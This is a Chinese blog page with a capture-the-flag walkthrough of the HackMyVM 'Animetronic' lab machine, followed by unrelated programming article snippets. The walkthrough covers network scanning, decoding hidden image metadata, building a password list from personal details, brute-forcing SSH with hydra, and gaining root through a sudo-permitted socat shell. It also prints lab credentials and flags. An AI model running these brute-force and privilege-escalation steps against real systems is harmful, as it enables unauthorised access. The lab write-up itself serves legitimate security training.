当前位置：首页 > news >正文

【hackmyvm】 Animetronic靶机

news 文章来源：https://blog.csdn.net/woshicainiao666/article/details/138679282 2025/4/5 11:33:53

靶机测试

arp-scan
port
url枚举
exiftool
套中套
password
sudo 提权

`
在这里插入图片描述

arp-scan

arp-scan 检测局域网中活动的主机

192.168.9.203    靶机IP地址

port

通过nmap扫描，获取目标主机的端口信息

┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.20322/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))

url枚举

dirsearch目录扫描，默认的字典，扫不出来

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r[07:22:28] 301 -  312B  - /img  ->  http://192.168.9.203/img/               
[07:22:33] 301 -  312B  - /css  ->  http://192.168.9.203/css/               
[07:22:36] 301 -  311B  - /js  ->  http://192.168.9.203/js/                 
[07:38:24] 301 -  319B  - /staffpages  ->  http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 -  278B  - /server-status                                     
[############        ] 60% 134151/220545       119/s       job:1/1  errors:82   
[5]+  已停止               dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Get a picture,必定有鬼

wget http://192.168.9.203/staffpages/new_employees.jpg

exiftool

┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg 
ExifTool Version Number         : 12.49
File Name                       : new_employees.jpeg
Directory                       : .
File Size                       : 160 kB
File Modification Date/Time     : 2023:11:27 12:11:43-05:00
File Access Date/Time           : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time     : 2024:05:10 05:53:33-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width                     : 703
Image Height                    : 1136
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 703x1136
Megapixels                      : 0.799

套中套

┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

CTF打多了，一眼就看出是倒着的字母 message_for_michael

访问 /staffpages/message_for_michael

Hi MichaelSorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt

访问/staffpages/personal_info.txt

name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming

password

通过个人信息生成密码字典

leahcim
michael
19961019
19101996
michael1996
leahcim1996
...

hydra爆破ssh

┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203[22][ssh] host: 192.168.9.203   login: michael   password: leahcim1996

sudo 提权

在/home目录下发现用户

michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt  user.txt
michael@animetronic:/home/henry$ cat user.txt 
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file namedaGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam

是henry的密码

michael@animetronic:/home/henry$ su henry
Password: 
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser henry may run the following commands on animetronic:(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a

【hackmyvm】 Animetronic靶机

靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址port 通过nmap扫描，获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists] └─# nmap -sT -sV -O 192.16…...

编程日记 2024/5/11 0:31:03

[附源码]石器时代_恐龙宝贝内购版_三网H5手游_带GM工具

石器时代之恐龙宝贝内购版_三网H5经典怀旧Q萌全网通手游_Linux服务端源码_视频架设教程_GM多功能授权后台_CDK授权后台本教程仅限学习使用，禁止商用，一切后果与本人无关，此声明具有法律效应！！！&#xff0…...

编程日记 2024/5/11 0:30:02

RS2255XN功能和参数介绍及PDF资料

RS2255XN是一款由Runic（润石）公司生产的模拟开关。以下是关于RS2255XN的一些技术参数和特点： 封装：MSOP-10 电源电压范围：2.5V至5.5V 工作温度范围：-40C至125C 类型：模拟开关品牌：R…...

编程日记 2024/5/11 0:29:01

设计模式——外观模式（Facade）

外观模式（Facade Pattern） 是一种结构型设计模式，它为一个子系统中的一组接口提供一个统一的高层接口，使得子系统更加容易使用。这种类型的设计模式属于结构型模式，它向客户端提供了一个接口，隐藏了子系统的…...

编程日记 2024/5/11 0:26:59

【linux软件基础知识】Linux 中的普通进程的调度机制

活动集Active processes和过期集Expired processes 为了实现静态优先级较低的进程没有完全锁定并有机会运行，Linux 调度程序维护两个不相交的可运行进程集：活动集和过期集。此机制是完全公平调度程序 (CFS) 算法的一部分。以下是这两组的工作原理：活动集Active proces…...

编程日记 2024/5/11 0:23:55

keil5软件安装教程（MDKv5.39）

keil5软件安装分为三部分： 目录 1.安装mdk 2.激活mdk 3.安装STM32芯片包 1.安装mdk 安装包链接：链接：https://pan.baidu.com/s/1PZoGhzI5Y19ROv7xe9QJKA?pwdgt3s 提取码：gt3s 1、下载keil5的压缩包并解压，鼠…...

编程日记 2024/5/11 0:22:53

改变视觉创造力：图像合成中基于样式的生成架构的影响和创新

原文地址：revolutionizing-visual-creativity-the-impact-and-innovations-of-style-based-generative 2024 年 4 月 30 日介绍基于风格的生成架构已经开辟了一个利基市场，它将机器学习的技术严谨性与类人创造力的微妙表现力融为一体。这一发展的核…...

编程日记 2024/5/11 0:21:52

【LAMMPS学习】八、基础知识(5.8)LAMMPS 中热化 Drude 振荡器教程

8. 基础知识此部分描述了如何使用 LAMMPS 为用户和开发人员执行各种任务。术语表页面还列出了 MD 术语，以及相应 LAMMPS 手册页的链接。 LAMMPS 源代码分发的 examples 目录中包含的示例输入脚本以及示例脚本页面上突出显示的示例输入脚本还展示了如何设置和运行各…...

编程日记 2024/5/11 0:19:50

基于SpringBoot的全国风景区WebGIS按省展示实践

目录前言一、全国风景区信息介绍 1、全国范围内数据分布 2、全国风景区分布 3、PostGIS空间关联查询二、后台查询的设计与实现 1、Model和Mapper层 2、业务层和控制层设计三、WebGIS可视化 1、省份范围可视化 2、省级风景区可视化展示 3、成果展示总结前…...

编程日记 2024/5/11 0:18:48

深入理解网络原理3----TCP核心特性介绍（上）【面试高频考点】

文章目录前言TCP协议段格式一、确认应答【保证可靠性传输的机制】二、超时重传【保证可靠性传输的机制】三、连接管理机制【保证可靠性传输的机制】3.1建立连接（TCP三次握手）---经典面试题3.2断开连接（四次挥手）3.3TCP状态转换四…...

编程日记 2024/5/11 0:17:47

Java并发编程之锁的艺术：面试与实战指南（三）

Java并发编程之锁的艺术：面试与实战指南（三） 文章目录 Java并发编程之锁的艺术：面试与实战指南（三）前言十七、Java中线程和进程的区别是什么？十八、什么是Java内存模型（JMM&#xff…...

编程日记 2024/5/11 0:16:46

Final Draft 12 for Mac：高效专业剧本创作软件

对于剧本创作者来说，一款高效、专业的写作工具是不可或缺的。Final Draft 12 for Mac就是这样一款完美的选择。这款专为Mac用户设计的剧本创作软件，凭借其卓越的性能和丰富的功能，让您的剧本创作更加得心应手。 Final Draft 12支持多种剧本格…...

编程日记 2024/5/11 0:15:45

php字符串变量和常见的字符串函数

在 PHP 中，字符串变量用于存储文本数据。你可以使用单引号（）、双引号（"）或定界符（heredoc 或 nowdoc）来定义字符串。下面是一些关于 PHP 字符串变量的重要点和示例： 1. 单引号…...

编程日记 2024/5/11 0:14:44

PPT基础

5种ppt仅可读形式 Ⅰ 开始选项卡 1.【幻灯片】组中：新建幻灯片，从大纲中导入幻灯片；修改幻灯片的版式；节（新增节，重命名节）。 2.【字体】组中：设置字体，字体大小&…...

编程日记 2024/5/11 0:13:43

初识JDBC

1、JDBC是什么？ Java DataBase Connectivity(Java语言连接数据库) 2、JDBC的本质是什么？ JDBC是SUN公司制定的一套接口(interface) java.sql.*;(这个包下有很多接口) 接口都有调用者和实现者。面向接口调用、面向接口写实现类，这都属于…...

编程日记 2024/5/11 0:12:42

React 学习-5

React 条件渲染: 与js中的写法一致注意：在 JavaScript 中，true && expression 总是返回 expression，而 false && expression 总是返回 false。因此，如果条件是 true，&& 右侧的元素就会被渲…...

编程日记 2024/5/11 0:11:41

深入浅出TCP 与 UDP

🔥 个人主页：空白诗文章目录 🔥 引言🌐 基础认知概览💻 TCP - 稳健的信使 🛡️🎭 UDP - 敏捷的使者 🏃‍♂️ 🧑‍💻 实战演练：代码示例TCP 服务…...

编程日记 2024/5/11 0:10:39

Leetcode—387. 字符串中的第一个唯一字符【简单】

2024每日刷题（127） Leetcode—387. 字符串中的第一个唯一字符实现代码 class Solution { public:int firstUniqChar(string s) {int count[26] {0};for(char c: s) {count[c - a];}for(int i 0; i < s.length(); i) {if(count[s[i] - a] 1) {re…...

编程日记 2024/5/11 0:07:36

Blazor入门-调用js+例子

参考： Blazor入门笔记（3）-C#与JS交互 - 半野 - 博客园 https://www.cnblogs.com/zxyao/p/12638233.html 本地环境：win10, visual studio 2022 community 其他例子写了再更新！ 调用js函数并传递参数首先要加上injec…...

编程日记 2024/5/11 0:05:33

暴力数据结构之栈与队列（队列详解）

1.队列的定义队列是一种特殊的线性表，它遵循先进先出（FIFO）的原则。在队列中，只允许在表的一端进行插入操作（队尾），而在另一端进行删除操作（队头）。这种数据结构确保了最…...

编程日记 2024/5/11 0:04:32

仿照JDK源码写一个ArrayList实现

仿照JDK编写一个简化的ArrayList实现是一个很好的学习Java集合框架内部工作原理的方式。以下是一个简化版的ArrayList实现，它包含了基本的添加、获取、删除和大小检查功能。 public class MyArrayList<E> {private static final int DEFAULT_CAPACITY = 10;private Obj…...

编程日记 2024/5/11 0:02:29

[链表专题]力扣21, 234

1. 力扣21 题 : 将两个升序链表合并为一个新的升序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。示例 1：输入：l1 [1,2,4], l2 [1,3,4] 输出：[1,1,2,3,4,4] 示例 2：输入：l1 [], l2 [] 输出&…...

编程日记 2024/5/11 0:01:23

智慧便民小程序源码系统求职招聘+房产出租+相亲交友带完整的安装代码包以及系统搭建教程

在数字化、智能化的今天，我们的生活节奏越来越快，对于各种服务的需求也越发多元化和个性化。为了满足广大市民对于便捷、高效、全面的服务需求，罗峰给大家分享一款智慧便民小程序源码系统，集求职招聘、房产出租、相亲交友三大功能…...

编程日记 2024/5/10 23:59:20

苹果免签封装的优势和安全风险

哈喽，大家好呀，淼淼又来和大家见面啦，许多小伙伴应该都知道，App Store一直是iOS应用的主要分发渠道，苹果生态系统的监管是十分严格的，以此确保了应用质量与用户的安全。而苹果免签封装则是有一种不需要通过…...

编程日记 2024/5/10 23:58:19

hook抓包trace定位实战

title: SO逆向之大众点评cx date: 2022-02-07 19:27:28 tags: SOfrida categories: 安卓逆向 toc_number: true抓包10.37.13 打开首页一篇文章，APP默认TCP连接，通过降级采用HTTP连接 jadx反编译代码中 public int g() {Object[] objArr = new Object[0];ChangeQuickRedire…...

编程日记 2024/5/10 23:56:17

SMB 协议详解之-TreeID原理和SMB数据包分析技巧

在前面分析SMB协议数据包的过程中，这里，可以看到在SMB协议中存在很多的ID，即Unique Identifiers。那么这些ID表示什么含义？在实际分析数据包的过程中如何根据这些ID进行过滤分析？本文将介绍SMB/SMB2中的tree id ，并介绍如何通过tree id 快速的分析SMB数据包中各种命令交互…...

编程日记 2024/5/10 23:54:15